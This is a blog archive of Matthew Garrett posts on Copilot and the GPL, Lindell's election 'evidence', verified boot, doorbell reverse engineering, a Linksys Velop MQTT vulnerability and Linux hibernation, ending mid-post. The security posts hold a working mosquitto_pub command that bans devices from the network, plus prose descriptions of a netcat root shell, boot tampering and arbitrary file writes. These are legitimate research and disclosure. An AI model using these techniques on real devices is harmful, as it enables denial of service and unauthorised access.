Tag Archives: fedora

Does free software benefit from ML models being derived works of training data?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/57615.html

Github recently announced Copilot, a machine learning system that makes suggestions for you when you’re writing code. It’s apparently trained on all public code hosted on Github, which means there’s a lot of free software in its training set. Github assert that the output of Copilot belongs to the user, although they admit that it may occasionally produce output that is identical to content from the training set.

Unsurprisingly, this has led to a number of questions along the lines of “If Copilot embeds code that is identical to GPLed training data, is my code now GPLed?”. This is extremely understandable, but the underlying issue is actually more general than that. Even code under permissive licenses like BSD requires retention of copyright notices and disclaimers, and failing to include them is just as much a copyright violation as incorporating GPLed code into a work and not abiding by the terms of the GPL is.

But free software licenses only have power to the extent that copyright permits them to. If your code isn’t a derived work of GPLed material, you have no obligation to follow the terms of the GPL. Github clearly believe that Copilot’s output doesn’t count as a derived work as far as US copyright law goes, and as a result the licenses on the training data don’t apply to the output. Some people have interpreted this as an attack on free software – Copilot may insert code that’s either identical or extremely similar to GPLed code, and claim that there are no license obligations created as a result, effectively allowing the laundering of GPLed code into proprietary software.

I’m completely unqualified to hold a strong opinion on whether Github’s legal position is justifiable or not, and right now I’m also not interested in thinking about it too much. What I think is more interesting is what the impact of either position has on free software. Do we benefit more from a future where the output of Copilot (or similar projects) is considered a derived work of the training data, or one where it isn’t? Having been involved in a bunch of GPL enforcement activities, it’s very easy to think of this as something that weakens the GPL and, as a result, weakens free software. That was my initial reaction, but that’s shifted over the past few days.

Let’s look at the GNU manifesto, specifically this section:

The fact that the easiest way to copy a program is from one neighbor to another, the fact that a program has both source code and object code which are distinct, and the fact that a program is used rather than read and enjoyed, combine to create a situation in which a person who enforces a copyright is harming society as a whole both materially and spiritually; in which a person should not do so regardless of whether the law enables him to.

The GPL makes use of copyright law to ensure that GPLed work can’t be taken from the commons. Anyone who produces a derived work of GPLed code is obliged to provide that work under the same terms. If software weren’t copyrightable, the GPL would have no power. But this is the outcome Stallman wanted! The GPL doesn’t exist because copyright is good, it exists because software being copyrightable is what enables the concept of proprietary software in the first place.

The powers that the GPL uses to enforce sharing of code are used by the authors of proprietary software to reduce that sharing. They attempt to forbid us from examining their code to determine how it works – they argue that anyone who does so is tainted, unable to contribute similar code to free software projects in case they produce a derived work of the original. Broadly speaking, the further the definition of a derived work reaches, the greater the power of proprietary software authors. If Oracle’s argument that APIs are copyrightable had prevailed, it would have been disastrous for free software. If the Apple look and feel suit had established that Microsoft infringed Apple’s copyright, we might be living in a future where we had no free software desktop environments.

When we argue for an interpretation of copyright law that enhances the power of the GPL, we’re also enhancing the power of giant corporations with a lot of lawyers on hand. So let’s look at this another way. If Github’s interpretation of copyright law holds, we can train a model on proprietary code and extract concepts without having to worry about being tainted. The proprietary code itself won’t enter the commons, but the ideas it embodies will. No more worries about whether you’re literally copying the code that implements an algorithm you want to duplicate – simply start typing and let the model remove the risk for you.

There’s a reasonable counter argument about equality here. How much GPL-influenced code is going to end up in proprietary projects when compared to the reverse? It’s not an easy question to answer, but we should bear in mind that the majority of public repositories on Github aren’t under an open source license. Copilot is already claiming to give us access to the concepts embodied in those repositories. Do these provide more value than is given up? I honestly don’t know how to measure that. But what I do know is that free software was founded in a belief that software shouldn’t be constrained by copyright, and our default stance shouldn’t be to argue against the idea that copyright is weaker than we imagined.

comment count unavailable comments

Mike Lindell’s Cyber “Evidence”

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/57459.html

Mike Lindell, notable for absolutely nothing relevant in this field, today filed a lawsuit against a couple of voting machine manufacturers in response to them suing him for defamation after he claimed that they were covering up hacks that had altered the course of the US election. Paragraph 104 of his suit asserts that he has evidence of at least 20 documented hacks, including the number of votes that were changed. The citation is just a link to a video called Absolute 9-0, which claims to present sufficient evidence that the US supreme court will come to a 9-0 decision that the election was tampered with.

The claim is that Lindell was provided with a set of files on the 9th of January, and gave these to some cyber experts to verify. These experts identified them as packet captures. The video contains scrolling hex, and we are told that this is the raw encrypted data from the files. In reality, the hex values correspond very clearly to printable ASCII, and appear to just be the Pennsylvania voter roll. They’re not encrypted, and they’re not packet captures (they contain no packet headers).

20 of these packet captures were then selected and analysed, giving us the tables contained within Exhibit 12. The alleged source IPs appear to correspond to the networks the tables claim, and the latitude and longitude presumably just come from a geoip lookup of some sort (although clearly those values are far too precise to be accurate). But if we look at the target IPs, we find something interesting. Most of them resolve to the website for the county that was the nominal target (eg, 198.108.253.104 is www.deltacountymi.org). So, we’re supposed to believe that in many cases, the county voting infrastructure was hosted on the county website.

Unfortunately we’re not given the destination port, but 198.108.253.104 isn’t listening on anything other than 80 and 443. We’re told that the packet data is encrypted, so presumably it’s over HTTPS. So, uh, how did they decrypt this to figure out how many votes were switched? If Mike’s hackers have broken TLS, they really don’t need to be dealing with this.

We’re also given some background information on how it’s impossible to reconstruct packet captures after the fact (untrue), or that modifying them would change their hashes (true, but in the absence of known good hash values that tells us nothing), but it’s pretty clear that nothing we’re shown actually demonstrates what we’re told it does.

In summary: yes, any supreme court decision on this would be 9-0, just not the way he’s hoping for.

Update: It was pointed out that this data appears to be part of a larger dataset. This one is even more dubious – it somehow has MAC addresses for both the source and destination (which is impossible), and almost none of these addresses are in actual issued ranges.

comment count unavailable comments

Producing a trustworthy x86-based Linux appliance

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/57199.html

Let’s say you’re building some form of appliance on top of general purpose x86 hardware. You want to be able to verify the software it’s running hasn’t been tampered with. What’s the best approach with existing technology?

Let’s split this into two separate problems. The first is to do as much as we can to ensure that the software can’t be modified without our consent[1]. This requires that each component in the boot chain verify that the next component is legitimate. We call the first component in this chain the root of trust, and in the x86 world this is the system firmware[2]. This firmware is responsible for verifying the bootloader, and the easiest way to do this on x86 is to use UEFI Secure Boot. In this setup the firmware contains a set of trusted signing certificates and will only boot executables with a chain of trust to one of these certificates. Switching the system into setup mode from the firmware menu will allow you to remove the existing keys and install new ones.

(Note: You shouldn’t use the trusted certificate directly for signing bootloaders – instead, the trusted certificate should be used to sign another certificate and the key for that certificate used to sign your bootloader. This way, if you ever need to revoke the signing certificate, you can simply sign a new one with the trusted parent and push out a revocation update instead of having to provision new keys)

But what do you want to sign? In the general purpose Linux world, we use an intermediate bootloader called Shim to bridge from the Microsoft signing authority to a distribution one. Shim then verifies the signature on grub, and grub in turn verifies the signature on the kernel. This is a large body of code that exists because of the use cases that general purpose distributions need to support – primarily, booting on arbitrary off the shelf hardware, and allowing arbitrary and complicated boot setups. This is unnecessary in the appliance case, where the hardware target can be well defined, where there’s no need for interoperability with the Microsoft signing authority, and where the boot configuration can be extremely static.

We can skip all of this complexity using systemd-boot’s unified Linux image support. This has the format described here, but the short version is that it’s simply a kernel and initramfs linked into a small EFI executable that will run them. Instructions for generating such an image are here, and if you follow them you’ll end up with a single static image that can be directly executed by the firmware. Signing this avoids dealing with a whole host of problems associated with relying on shim and grub, but note that you’ll be embedding the initramfs as well. Again, this should be fine for appliance use-cases, but you’ll need your build system to support building the initramfs at image creation time rather than relying on it being generated on the host.

At this point we have a single image that can be verified by the firmware and will get us to the point of a running kernel and initramfs. Unless you’ve got enough RAM that you can put your entire workload in the initramfs, you’re going to want a filesystem as well, and you’re going to want to verify that that filesystem hasn’t been tampered with. The easiest approach to this is to use dm-verity, a device-mapper layer that uses a hash tree to verify that the filesystem contents haven’t been modified. The kernel needs to know what the root hash is, so this can either be embedded into your initramfs image or into the kernel command line. Either way, it’ll end up in the signed boot image, so nobody will be able to tamper with it.

It’s important to note that a dm-verity partition is read-only – the kernel doesn’t have the cryptographic secret that would be required to generate a new hash tree if the partition is modified. So if you require the ability to write data or logs anywhere, you’ll need to add a new partition for that. If this partition is unencrypted, an attacker with access to the device will be able to put whatever they want on there. You should treat any data you read from there as untrusted, and ensure that it’s validated before use (ie, don’t just feed it to a random parser written in C and expect that everything’s going to be ok). On the other hand, if it’s encrypted, remember that you can’t just put the encryption key in the boot image – an attacker with access to the device is going to be able to dump that and extract it. You’ll probably want to use a TPM-sealed encryption secret, which will be discussed later on.

At this point everything in the boot process is cryptographically verified, and so should be difficult to tamper with. Unfortunately this isn’t really sufficient – on x86 systems there’s typically no verification of the integrity of the secure boot database. An attacker with physical access to the system could attach a programmer directly to the firmware flash and rewrite the secure boot database to include keys they control. They could then replace the boot image with one that they’ve signed, and the machine would happily boot code that the attacker controlled. We need to be able to demonstrate that the system booted using the correct secure boot keys, and the only way we can do that is to use the TPM.

I wrote an introduction to TPMs a while back. The important thing to know here is that the TPM contains a set of Platform Configuration Registers that are large enough to contain a cryptographic hash. During boot, each component of the boot process will generate a “measurement” of other security critical components, including the next component to be booted. These measurements are a representation of the data in question – they may simply be a hash of the object being measured, or the hash of a structure containing various pieces of metadata. Each measurement is passed to the TPM, along with the PCR it should be measured into. The TPM takes the new measurement, appends it to the existing value, and then stores the hash of this concatenated data in the PCR. This means that the final PCR value depends not only on the measurement, but also on every previous measurement. Without breaking the hash algorithm, there’s no way to set the PCR to an arbitrary value. The hash values and some associated data are stored in a log that’s kept in system RAM, which we’ll come back to later.

Different PCRs store different pieces of information, but the one that’s most interesting to us is PCR 7. Its use is documented in the TCG PC Client Platform Firmware Profile (section 3.3.4.8), but the short version is that the firmware will measure the secure boot keys that are used to boot the system. If the secure boot keys are altered (such as by an attacker flashing new ones), the PCR 7 value will change.

What can we do with this? There’s a couple of choices. For devices that are online, we can perform remote attestation, a process where the device can provide a signed copy of the PCR values to another system. If the system also provides a copy of the TPM event log, the individual events in the log can be replayed in the same way that the TPM would use to calculate the PCR values, and then compared to the actual PCR values. If they match, that implies that the log values are correct, and we can then analyse individual log entries to make assumptions about system state. If a device has been tampered with, the PCR 7 values and associated log entries won’t match the expected values, and we can detect the tampering.

If a device is offline, or if there’s a need to permit local verification of the device state, we still have options. First, we can perform remote attestation to a local device. I demonstrated doing this over Bluetooth at LCA back in 2020. Alternatively, we can take advantage of other TPM features. TPMs can be configured to store secrets or keys in a way that renders them inaccessible unless a chosen set of PCRs have specific values. This is used in tpm2-totp, which uses a secret stored in the TPM to generate a TOTP value. If the same secret is enrolled in any standard TOTP app, the value generated by the machine can be compared to the value in the app. If they match, the PCR values the secret was sealed to are unmodified. If they don’t, or if no numbers are generated at all, that demonstrates that PCR 7 is no longer the same value, and that the system has been tampered with.

Unfortunately, TOTP requires that both sides have possession of the same secret. This is fine when a user is making that association themselves, but works less well if you need some way to ship the secret on a machine and then separately ship the secret to a user. If the user can simply download the secret via some API, so can an attacker. If an attacker has the secret, they can modify the secure boot database and re-seal the secret to the new PCR 7 value. That means having to add some form of authentication, along with a strong binding of machine serial number to a user (in order to avoid someone with valid credentials simply downloading all the secrets).

Instead, we probably want some mechanism that uses asymmetric cryptography. A keypair can be generated on the TPM, which will refuse to release an unencrypted copy of the private key. The public key, however, can be exported and stored. If it’s acceptable for a verification app to connect to the internet then the public key can simply be obtained that way – if not, a certificate can be issued to the key, and this exposed to the verifier via a QR code. The app then verifies that the certificate is signed by the vendor, and if so extracts the public key from that. The private key can have an associated policy that only permits its use when PCR 7 has an appropriate value, so the app then generates a nonce and asks the user to type that into the device. The device generates a signature over that nonce and displays that as a QR code. The app verifies the signature matches, and can then assert that PCR 7 has the expected value.

Once we can assert that PCR 7 has the expected value, we can assert that the system booted something signed by us and thus infer that the rest of the boot chain is also secure. But this is still dependent on the TPM obtaining trustworthy information, and unfortunately the bus that the TPM sits on isn’t really terribly secure (TPM Genie is an example of an interposer for i2c-connected TPMs, but there’s no reason an LPC one can’t be constructed to attack the sort usually used on PCs). TPMs do support encrypted communication channels, but bootstrapping those isn’t straightforward without firmware support. The easiest way around this is to make use of a firmware-based TPM, where the TPM is implemented in software running on an ancillary controller. Intel’s solution is part of their Platform Trust Technology and runs on the Management Engine, AMD run it on the Platform Security Processor. In both cases it’s not terribly feasible to intercept the communications, so we avoid this attack. The downside is that we’re then placing more trust in components that are running much more code than a TPM would and which have a correspondingly larger attack surface. Which is preferable is going to depend on your threat model.

Most of this should be achievable using Yocto, which now has support for dm-verity built in. It’s almost certainly going to be easier using this than trying to base on top of a general purpose distribution. I’d love to see this become a largely push button receive secure image process, so might take a go at that if I have some free time in the near future.

[1] Obviously technologies that can be used to ensure nobody other than me is able to modify the software on devices I own can also be used to ensure that nobody other than the manufacturer is able to modify the software on devices that they sell to third parties. There’s no real technological solution to this problem, but we shouldn’t allow the fact that a technology can be used in ways that are hostile to user freedom to cause us to reject that technology outright.
[2] This is slightly complicated due to the interactions with the Management Engine (on Intel) or the Platform Security Processor (on AMD). Here’s a good writeup on the Intel side of things.

comment count unavailable comments

More doorbell adventures

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/56917.html

Back in my last post on this topic, I’d got shell on my doorbell but hadn’t figured out why the HTTP callbacks weren’t always firing. I still haven’t, but I have learned some more things.

Doorbird sell a chime, a network connected device that is signalled by the doorbell when someone pushes a button. It costs about $150, which seems excessive, but would solve my problem (ie, that if someone pushes the doorbell and I’m not paying attention to my phone, I miss it entirely). But given a shell on the doorbell, how hard could it be to figure out how to mimic the behaviour of one?

Configuration for the doorbell is all stored under /mnt/flash, and there’s a bunch of files prefixed 1000eyes that contain config (1000eyes is the German company that seems to be behind Doorbird). One of these was called 1000eyes.peripherals, which seemed like a good starting point. The initial contents were {"Peripherals":[]}, so it seemed likely that it was intended to be JSON. Unfortunately, since I had no access to any of the peripherals, I had no idea what the format was. I threw the main application into Ghidra and found a function that had debug statements referencing “initPeripherals and read a bunch of JSON keys out of the file, so I could simply look at the keys it referenced and write out a file based on that. I did so, and it didn’t work – the app stubbornly refused to believe that there were any defined peripherals. The check that was failing was pcVar4 = strstr(local_50[0],PTR_s_"type":"_0007c980);, which made no sense, since I very definitely had a type key in there. And then I read it more closely. strstr() wasn’t being asked to look for "type":, it was being asked to look for "type":". I’d left a space between the : and the opening ” in the value, which meant it wasn’t matching. The rest of the function seems to call an actual JSON parser, so I have no idea why it doesn’t just use that for this part as well, but deleting the space and restarting the service meant it now believed I had a peripheral attached.

The mobile app that’s used for configuring the doorbell now showed a device in the peripherals tab, but it had a weird corrupted name. Tapping it resulted in an error telling me that the device was unavailable, and on the doorbell itself generated a log message showing it was trying to reach a device with the hostname bha-04f0212c5cca and (unsurprisingly) failing. The hostname was being generated from the MAC address field in the peripherals file and was presumably supposed to be resolved using mDNS, but for now I just threw a static entry in /etc/hosts pointing at my Home Assistant device. That was enough to show that when I opened the app the doorbell was trying to call a CGI script called peripherals.cgi on my fake chime. When that failed, it called out to the cloud API to ask it to ask the chime[1] instead. Since the cloud was completely unaware of my fake device, this didn’t work either. I hacked together a simple server using Python’s HTTPServer and was able to return data (another block of JSON). This got me to the point where the app would now let me get to the chime config, but would then immediately exit. adb logcat showed a traceback in the app caused by a failed assertion due to a missing key in the JSON, so I ran the app through jadx, found the assertion and from there figured out what keys I needed. Once that was done, the app opened the config page just fine.

Unfortunately, though, I couldn’t edit the config. Whenever I hit “save” the app would tell me that the peripheral wasn’t responding. This was strange, since the doorbell wasn’t even trying to hit my fake chime. It turned out that the app was making a CGI call to the doorbell, and the thread handling that call was segfaulting just after reading the peripheral config file. This suggested that the format of my JSON was probably wrong and that the doorbell was not handling that gracefully, but trying to figure out what the format should actually be didn’t seem easy and none of my attempts improved things.

So, new approach. Rather than writing the config myself, why not let the doorbell do it? I should be able to use the genuine pairing process if I could mimic the chime sufficiently well. Hitting the “add” button in the app asked me for the username and password for the chime, so I typed in something random in the expected format (six characters followed by four zeroes) and a sufficiently long password and hit ok. A few seconds later it told me it couldn’t find the device, which wasn’t unexpected. What was a little more unexpected was that the log on the doorbell was showing it trying to hit another bha-prefixed hostname (and, obviously, failing). The hostname contains the MAC address, but I hadn’t told the doorbell the MAC address of the chime, just its username. Some more digging showed that the doorbell was calling out to the cloud API, giving it the 6 character prefix from the username and getting a MAC address back. Doing the same myself revealed that there was a straightforward mapping from the prefix to the mac address – changing the final character from “a” to “b” incremented the MAC by one. It’s actually just a base 26 encoding of the MAC, with aaaaaa translating to 00408C000000.

That explained how the hostname was being generated, and in return I was able to work backwards to figure out which username I should use to generate the hostname I was already using. Attempting to add it now resulted in the doorbell making another CGI call to my fake chime in order to query its feature set, and by mocking that up as well I was able to send back a file containing X-Intercom-Type, X-Intercom-TypeId and X-Intercom-Class fields that made the doorbell happy. I now had a valid JSON file, which cleared up a couple of mysteries. The corrupt name was because the name field isn’t supposed to be ASCII – it’s base64 encoded UTF16-BE. And the reason I hadn’t been able to figure out the JSON format correctly was because it looked something like this:

{"Peripherals":[]{"prefix":{"type":"DoorChime","name":"AEQAbwBvAHIAYwBoAGkAbQBlACAAVABlAHMAdA==","mac":"04f0212c5cca","user":"username","password":"password"}}]}

Note that there’s a total of one [ in this file, but two ]s? Awesome. Anyway, I could now modify the config in the app and hit save, and the doorbell would then call out to my fake chime to push config to it. Weirdly, the association between the chime and a specific button on the doorbell is only stored on the chime, not on the doorbell. Further, hitting the doorbell didn’t result in any more HTTP traffic to my fake chime. However, it did result in some broadcast UDP traffic being generated. Searching for the port number led me to the Doorbird LAN API and a complete description of the format and encryption mechanism in use. Argon2I is used to turn the first five characters of the chime’s password (which is also stored on the doorbell itself) into a 256-bit key, and this is used with ChaCha20 to decrypt the payload. The payload then contains a six character field describing the device sending the event, and then another field describing the event itself. Some more scrappy Python and I could pick up these packets and decrypt them, which showed that they were being sent whenever any event occurred on the doorbell. This explained why there was no storage of the button/chime association on the doorbell itself – the doorbell sends packets for all events, and the chime is responsible for deciding whether to act on them or not.

On closer examination, it turns out that these packets aren’t just sent if there’s a configured chime. One is sent for each configured user, avoiding the need for a cloud round trip if your phone is on the same network as the doorbell at the time. There was literally no need for me to mimic the chime at all, suitable events were already being sent.

Still. There’s a fair amount of WTFery here, ranging from the strstr() based JSON parsing, the invalid JSON, the symmetric encryption that uses device passwords as the key (requiring the doorbell to be aware of the chime’s password) and the use of only the first five characters of the password as input to the KDF. It doesn’t give me a great deal of confidence in the rest of the device’s security, so I’m going to keep playing.

[1] This seems to be to handle the case where the chime isn’t on the same network as the doorbell

comment count unavailable comments

An accidental bootsplash

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/56663.html

Back in 2005 we had Debconf in Helsinki. Earlier in the year I’d ended up invited to Canonical’s Ubuntu Down Under event in Sydney, and one of the things we’d tried to design was a reasonable graphical boot environment that could also display status messages. The design constraints were awkward – we wanted it to be entirely in userland (so we didn’t need to carry kernel patches), and we didn’t want to rely on vesafb[1] (because at the time we needed to reinitialise graphics hardware from userland on suspend/resume[2], and vesa was not super compatible with that). Nothing currently met our requirements, but by the time we’d got to Helsinki there was a general understanding that Paul Sladen was going to implement this.

The Helsinki Debconf ended being an extremely strange event, involving me having to explain to Mark Shuttleworth what the physics of a bomb exploding on a bus were, many people being traumatised by the whole sauna situation, and the whole unfortunate water balloon incident, but it also involved Sladen spending a bunch of time trying to produce an SVG of a London bus as a D-Bus logo and not really writing our hypothetical userland bootsplash program, so on the last night, fueled by Koff that we’d bought by just collecting all the discarded empty bottles and returning them for the deposits, I started writing one.

I knew that Debian was already using graphics mode for installation despite having a textual installer, because they needed to deal with more complex fonts than VGA could manage. Digging into the code, I found that it used BOGL – a graphics library that made use of the VGA framebuffer to draw things. VGA had a pre-allocated memory range for the framebuffer[3], which meant the firmware probably wouldn’t map anything else there any hitting those addresses probably wouldn’t break anything. This seemed safe.

A few hours later, I had some code that could use BOGL to print status messages to the screen of a machine booted with vga16fb. I woke up some time later, somehow found myself in an airport, and while sitting at the departure gate[4] I spent a while staring at VGA documentation and worked out which magical calls I needed to make to have it behave roughly like a linear framebuffer. Shortly before I got on my flight back to the UK, I had something that could also draw a graphical picture.

Usplash shipped shortly afterwards. We hit various issues – vga16fb produced a 640×480 mode, and some laptops were not inclined to do that without a BIOS call first. 640×400 worked basically everywhere, but meant we had to redraw the art because circles don’t work the same way if you change the resolution. My brief “UBUNTU BETA” artwork that was me literally writing “UBUNTU BETA” on an HP TC1100 shortly after I’d got the Wacom screen working did not go down well, and thankfully we had better artwork before release.

But 16 colours is somewhat limiting. SVGALib offered a way to get more colours and better resolution in userland, retaining our prerequisites. Unfortunately it relied on VM86, which doesn’t exist in 64-bit mode on Intel systems. I ended up hacking the X.org x86emu into a thunk library that exposed the same API as LRMI, so we could run it without needing VM86. Shockingly, it worked – we had support for 256 colour bootsplashes in any supported resolution on 64 bit systems as well as 32 bit ones.

But by now it was obvious that the future was having the kernel manage graphics support, both in terms of native programming and in supporting suspend/resume. Plymouth is much more fully featured than Usplash ever was, but relies on functionality that simply didn’t exist when we started this adventure. There’s certainly an argument that we’d have been better off making reasonable kernel modesetting support happen faster, but at this point I had literally no idea how to write decent kernel code and everyone should be happy I kept this to userland.

Anyway. The moral of all of this is that sometimes history works out such that you write some software that a huge number of people run without any idea of who you are, and also that this can happen without you having any fucking idea what you’re doing.

Write code. Do crimes.

[1] vesafb relied on either the bootloader or the early stage kernel performing a VBE call to set a mode, and then just drawing directly into that framebuffer. When we were doing GPU reinitialisation in userland we couldn’t guarantee that we’d run before the kernel tried to draw stuff into that framebuffer, and there was a risk that that was mapped to something dangerous if the GPU hadn’t been reprogrammed into the same state. It turns out that having GPU modesetting in the kernel is a Good Thing.

[2] ACPI didn’t guarantee that the firmware would reinitialise the graphics hardware, and as a result most machines didn’t. At this point Linux didn’t have native support for initialising most graphics hardware, so we fell back to doing it from userland. VBEtool was a terrible hack I wrote to try to re-execute the system’s graphics hardware through a range of mechanisms, and it worked in a surprising number of cases.

[3] As long as you were willing to deal with 640×480 in 16 colours

[4] Helsinki-Vantaan had astonishingly comfortable seating for time

comment count unavailable comments

Exploring my doorbell

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/56345.html

I’ve talked about my doorbell before, but started looking at it again this week because sometimes it simply doesn’t send notifications to my Home Assistant setup – the push notifications appear on my phone, but the doorbell simply doesn’t trigger the HTTP callback it’s meant to[1]. This is obviously suboptimal, but it’s also tricky to debug a device when you have no access to it.

Normally I’d just head straight in with a screwdriver, but the doorbell is shared with the other units in this building and it seemed a little anti-social to interfere with a shared resource. So I bought some broken units from ebay and pulled one of them apart. There’s several boards inside, but one of them had a conveniently empty connector at the top with “TX”, “RX” and “GND” labelled. Sticking a USB-serial converter on this gave me output from U-Boot, and then kernel output. Confirmation that my doorbell runs Linux, but unfortunately it didn’t give me a shell prompt. My next approach would often me to just dump the flash and look for vulnerabilities that way, but this device uses TSOP-48 packaged NAND flash rather than the more convenient SPI NOR flash that I already have adapters to access. Dumping this sort of NAND isn’t terribly hard, but the easiest way to do it involves desoldering it from the board and plugging it into something like a Flashcat USB adapter, and my soldering’s not good enough to put it back on the board afterwards. So I wanted another approach.

U-Boot gave a short countdown to hit a key before continuing with boot, and for once hitting a key actually did something. Unfortunately it then prompted for a password, and giving the wrong one resulted in boot continuing[2]. In the past I’ve had good luck forcing U-Boot to drop to a prompt by simply connecting one of the data lines on SPI flash to ground while it’s trying to read the kernel – the failed read causes U-Boot to error out. It turns out the same works fine on raw NAND, so I just edited the kernel boot arguments to append “init=/bin/sh” and soon I had a shell.

From here on, things were made easier by virtue of the device using the YAFFS filesystem. Unlike many flash filesystems, it’s read/write, so I could make changes that would persist through to the running system. There was a convenient copy of telnetd included, but it segfaulted on startup, which reduced its usefulness. Fortunately there was also a copy of Netcat[3]. If you make a fifo somewhere on the filesystem, you can cat the fifo to a shell, pipe the shell to a netcat listener, and then pipe netcat’s output back to the fifo. The shell’s output all gets passed to whatever connects to netcat, and whatever’s sent to netcat gets passed through the fifo back to the shell. This is, obviously, horribly insecure, but it was enough to get a root shell over the network on the running device.

The doorbell runs various bits of software, one of which is Lighttpd to provide a local API and access to the device. Another component (“nxp-client”) connects to the vendor’s cloud infrastructure and passes cloud commands back to the local webserver. This is where I found something strange. Lighttpd was refusing to start because its modules wanted library symbols that simply weren’t present on the device. My best guess is that a firmware update went wrong and left the device in a partially upgraded state – and without a working local webserver, there was no way to perform any further updates. This may explain why this doorbell was sitting on ebay.

Anyway. Now that I had shell, I could simply dump the flash by copying it directly off the /dev/mtdblock devices – since I had netcat, I could just pipe stuff through that back to my actual computer. Now I had access to the filesystem I could extract that locally and start digging into it more deeply. One incredibly useful tool for this is qemu-user. qemu is a general purpose hardware emulation platform, usually used to emulate entire systems. But in qemu-user mode, it instead only emulates the CPU. When a piece of code tries to make a system call to access the kernel, qemu-user translates that to the appropriate calling convention for the host kernel and makes that call instead. Combined with binfmt_misc, you can configure a Linux system to be able to run Linux binaries from other architectures. One of the best things about this is that, because they’re still using the host convention for making syscalls, you can run the host strace on them and see what they’re doing.

What I found was that nxp-client was calling back to the cloud platform, setting up an encrypted communication channel (using ChaCha20 and a bunch of key setup stuff I couldn’t be bothered picking apart) and then waiting for commands from the cloud. It would then proxy those through to the local webserver. Since I couldn’t run the local lighttpd, I just wrote a trivial Python app using http.server and waited to see what requests I got. The first was a GET to a CGI script called editcgi.cgi, along with a path name. I mocked up the GET request to respond with what was on the actual filesystem. The cloud then proceeded to POST to editcgi.cgi, with the same pathname and with new file contents. editcgi.cgi is apparently able to read and write to files on the filesystem.

But this is on the interface that’s exposed to the cloud client, so this didn’t appear immediately useful – and, indeed, trying to hit the same CGI binary over the local network gave me a 401 unauthorized error. There’s a local API spec for these doorbells, but they all refer to scripts in the bha-api namespace, and this script was in the plain cgi-bin namespace. But then I noticed that the bha-api namespace didn’t actually exist in the filesystem – instead, lighttpd’s mod_alias was configured to rewrite requests to bha-api through to files in cgi-bin. And by using the documented API to get a session token, I could call editcgi.cgi to read and write arbitrary files on the doorbell. Which means I can drop an extra script in /etc/rc.d/rc3.d and get a shell on my doorbell.

This all requires the ability to have local authentication credentials, so it’s not a big security deal other than it allowing you to retain access to a monitoring device even after you’ve moved out and had your credentials revoked. I’m sure it’s all fine.

[1] I can ping the doorbell from the Home Assistant machine, so it’s not that the network is flaky
[2] The password appears to be [email protected] if anyone else ends up in this situation
[3] https://twitter.com/mjg59/status/654578208545751040

comment count unavailable comments

Unauthenticated MQTT endpoints on Linksys Velop routers enable local DoS

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/56106.html

(Edit: this is CVE-2021-1000002)

Linksys produces a series of wifi mesh routers under the Velop line. These routers use MQTT to send messages to each other for coordination purposes. In the version I tested against, there was zero authentication on this – anyone on the local network is able to connect to the MQTT interface on a router and send commands. As an example:
mosquitto_pub -h 192.168.1.1 -t "network/master/cmd/nodes_temporary_blacklist" -m '{"data": {"client": "f8:16:54:43:e2:0c", "duration": "3600", "action": "start"}}'
will ask the router to block the client with MAC address f8:16:54:43:e2:0c from the network for an hour. Various other MQTT topics pass parameters to shell scripts without quoting them or escaping metacharacters, so more serious outcomes may be possible.

The vendor has released two firmware updates since report – I have not verified whether either fixes this, but the changelog does not indicate any security issues were addressed.

Timeline:

2020-07-30: Submitted through the vendor’s security vulnerability report form, indicating that I plan to disclose in either 90 days or after a fix is released. The form turns out to file a Bugcrowd submission.
2020-07-30: I claim the Bugcrowd submission.
2020-08-19: Vendor acknowledges the issue, is able to reproduce and assigns it a P3 priority.
2020-12-15: I ask if there’s an update.
2021-02-02: I ask if there’s an update.
2021-02-03: Bugcrowd raise a blocker on the issue, asking the vendor to respond.
2021-02-17: I ask for permission to disclose.
2021-03-09: In the absence of any response from the vendor since 2020-08-19, I violate Bugcrowd disclosure policies and unilaterally disclose.

comment count unavailable comments

Making hibernation work under Linux Lockdown

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55845.html

Linux draws a distinction between code running in kernel (kernel space) and applications running in userland (user space). This is enforced at the hardware level – in x86-speak[1], kernel space code runs in ring 0 and user space code runs in ring 3[2]. If you’re running in ring 3 and you attempt to touch memory that’s only accessible in ring 0, the hardware will raise a fault. No matter how privileged your ring 3 code, you don’t get to touch ring 0.

Kind of. In theory. Traditionally this wasn’t well enforced. At the most basic level, since root can load kernel modules, you could just build a kernel module that performed any kernel modifications you wanted and then have root load it. Technically user space code wasn’t modifying kernel space code, but the difference was pretty semantic rather than useful. But it got worse – root could also map memory ranges belonging to PCI devices[3], and if the device could perform DMA you could just ask the device to overwrite bits of the kernel[4]. Or root could modify special CPU registers (“Model Specific Registers”, or MSRs) that alter CPU behaviour via the /dev/msr interface, and compromise the kernel boundary that way.

It turns out that there were a number of ways root was effectively equivalent to ring 0, and the boundary was more about reliability (ie, a process running as root that ends up misbehaving should still only be able to crash itself rather than taking down the kernel with it) than security. After all, if you were root you could just replace the on-disk kernel with a backdoored one and reboot. Going deeper, you could replace the bootloader with one that automatically injected backdoors into a legitimate kernel image. We didn’t have any way to prevent this sort of thing, so attempting to harden the root/kernel boundary wasn’t especially interesting.

In 2012 Microsoft started requiring vendors ship systems with UEFI Secure Boot, a firmware feature that allowed[5] systems to refuse to boot anything without an appropriate signature. This not only enabled the creation of a system that drew a strong boundary between root and kernel, it arguably required one – what’s the point of restricting what the firmware will stick in ring 0 if root can just throw more code in there afterwards? What ended up as the Lockdown Linux Security Module provides the tooling for this, blocking userspace interfaces that can be used to modify the kernel and enforcing that any modules have a trusted signature.

But that comes at something of a cost. Most of the features that Lockdown blocks are fairly niche, so the direct impact of having it enabled is small. Except that it also blocks hibernation[6], and it turns out some people were using that. The obvious question is “what does hibernation have to do with keeping root out of kernel space”, and the answer is a little convoluted and is tied into how Linux implements hibernation. Basically, Linux saves system state into the swap partition and modifies the header to indicate that there’s a hibernation image there instead of swap. On the next boot, the kernel sees the header indicating that it’s a hibernation image, copies the contents of the swap partition back into RAM, and then jumps back into the old kernel code. What ensures that the hibernation image was actually written out by the kernel? Absolutely nothing, which means a motivated attacker with root access could turn off swap, write a hibernation image to the swap partition themselves, and then reboot. The kernel would happily resume into the attacker’s image, giving the attacker control over what gets copied back into kernel space.

